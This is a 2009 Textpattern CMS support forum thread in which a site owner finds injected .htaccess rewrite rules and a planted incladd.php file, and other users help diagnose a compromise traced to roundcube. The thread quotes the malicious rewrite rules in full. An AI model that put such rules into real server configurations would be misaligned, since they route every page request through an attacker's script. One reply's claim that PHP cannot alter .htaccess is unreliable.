[resolved] Is this an attack?

schussat · 2009-03-28 02:54:53

I upgraded to 4.0.8 last weekend, and this evening was poking around and found the following at the top of my .htaccess:

RewriteCond /MY/ROOT/PATH/PUBLIC_HTML/archives/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !777b16.php$
RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /archives/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]

And a file incladd.php in my archives directory.

Is this an attack? What’s going on?

schussat · 2009-03-28 03:09:32

yeah, incladd.php shows up on searches as an exploit. Fuck.

the_ghost · 2009-03-28 08:07:29

IMHO justchange ftp passwords. It’simposible to chenage .htaccess content via php scripts

colak · 2009-03-28 08:15:11

if they got in via ftp, it will also be advisable to change your db password too.

jakob · 2009-03-28 08:35:49

Never seen this before but googled and saw that many complain about it being reinstated. One further recommendation mentioned was to check your hosting panel/account login, email and password, so that places from where the ftp account details are set are also no longer reachable with the old contact details.

schussat · 2009-03-28 13:59:09

Thanks for feedback, all. I think the original source of the exploit was a vulnerability in roundcube, which I’ve now deleted, and I’ve changed all passwords.

jdueck · 2009-04-08 16:29:17

I just had this same problem on my personal site, looks like they got in on the 23rd. I knew I should have deleted roundcube long ago.

Textpattern CMS

Textpattern CMS support forum

#1 2009-03-28 02:54:53

[resolved] Is this an attack?

#2 2009-03-28 03:09:32

Re: [resolved] Is this an attack?

#3 2009-03-28 08:07:29

Re: [resolved] Is this an attack?

#4 2009-03-28 08:15:11

Re: [resolved] Is this an attack?

#5 2009-03-28 08:35:49

Re: [resolved] Is this an attack?

#6 2009-03-28 13:59:09

Re: [resolved] Is this an attack?

#7 2009-04-08 16:29:17

Re: [resolved] Is this an attack?

Board footer